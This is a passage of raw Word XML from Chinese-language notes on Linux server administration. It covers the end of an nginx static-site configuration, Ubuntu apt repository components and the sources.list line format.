        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，所以不使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>proxy_pass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    location / {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        root /home/www/dist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        index index.html index.htm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        autoindex on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        autoindex_exact_size on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        autoindex_localtime on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>access_log /var/log/nginx/access.log main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>error_log /var/log/nginx/error.log warn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>server_tokens off</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68825545" w14:textId="77777777" w:rsidR="00BE7374" w:rsidRPr="00BE7374" w:rsidRDefault="00BE7374" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02A7F88F" w14:textId="77777777" w:rsidR="0012389C" w:rsidRDefault="0012389C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26EFE172" w14:textId="77777777" w:rsidR="0012389C" w:rsidRDefault="0012389C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="703B3968" w14:textId="77777777" w:rsidR="0012389C" w:rsidRDefault="0012389C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DEBFDE4" w14:textId="77777777" w:rsidR="0012389C" w:rsidRDefault="0012389C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BC3E5E5" w14:textId="77777777" w:rsidR="0012389C" w:rsidRDefault="0012389C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E84B48" w14:textId="77777777" w:rsidR="0012389C" w:rsidRDefault="0012389C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="385F70FE" w14:textId="24655CEE" w:rsidR="00BD0304" w:rsidRDefault="00BD0304" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="197" w:name="_Toc159779657"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>apt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源</w:t>
      </w:r>
      <w:bookmarkEnd w:id="197"/>
    </w:p>
    <w:p w14:paraId="6E870019" w14:textId="77777777" w:rsidR="0020603C" w:rsidRDefault="0020603C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E0216A6" w14:textId="77777777" w:rsidR="0020603C" w:rsidRPr="0020603C" w:rsidRDefault="0020603C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2571DFD4" w14:textId="3A355AF9" w:rsidR="00BD0304" w:rsidRDefault="008B72DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完全的自由软件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAF0C97" w14:textId="09DF7939" w:rsidR="008B72DB" w:rsidRDefault="00623BB2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>res</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tricted: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不完全的自由软件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72976397" w14:textId="1875FE49" w:rsidR="00BD0304" w:rsidRDefault="004E2CC2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>universe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方不提供支持和补丁，全靠社区支持</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A843205" w14:textId="71DB2735" w:rsidR="004E2CC2" w:rsidRDefault="009521C6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>multiverse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>非自由软件，完全不提供支持和补丁</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FE58A2" w14:textId="77777777" w:rsidR="009521C6" w:rsidRDefault="009521C6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="599857AE" w14:textId="6E799DB5" w:rsidR="00BD0304" w:rsidRDefault="0020603C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="198" w:name="_Toc159779658"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>apt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="198"/>
    </w:p>
    <w:p w14:paraId="177EE846" w14:textId="1FB0CD91" w:rsidR="0020603C" w:rsidRDefault="0020603C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0020603C">
        <w:t>https://blog.hz2016.com/2023/03/apt%E6%BA%90%E7%9A%84%E5%B7%A5%E4%BD%9C%E5%8E%9F%E7%90%86/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A603F12" w14:textId="77777777" w:rsidR="00BD0304" w:rsidRPr="00BD0304" w:rsidRDefault="00BD0304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35E9EF4E" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="384"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>镜像源地址遵循以下格式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8E55D4" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222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consolata" w:eastAsia="宋体" w:hAnsi="Inconsolata" w:cs="宋体"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Inconsolata" w:eastAsia="宋体" w:hAnsi="Inconsolata" w:cs="宋体"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>DebType AddressType://Hostaddress/ubuntu Distribution Component1 Component2.....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717FA5B1" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>其中各字段含义如下所示。</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t>1. DebType</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>表示</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Deb</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>软件包类型，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>deb</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>表示二进制软件包，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>deb-src</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>表示源码包；</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>对于大部分用户来说，二进制软件包即可完成安装，二进制软件包会被安装在系统的默认目录下（</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Inconsolata" w:eastAsia="宋体" w:hAnsi="Inconsolata" w:cs="宋体"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>usr/share</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Inconsolata" w:eastAsia="宋体" w:hAnsi="Inconsolata" w:cs="宋体"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Inconsolata" w:eastAsia="宋体" w:hAnsi="Inconsolata" w:cs="宋体"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>usr/bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>）。而源码包需要自己编译安装，但可以自己指定安装位置。</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>源码可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Inconsolata" w:eastAsia="宋体" w:hAnsi="Inconsolata" w:cs="宋体"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>apt-get source PackageName</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>获得，以下是源码安装的一个例子</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>(g2o)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490464EC" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="DD4A68"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
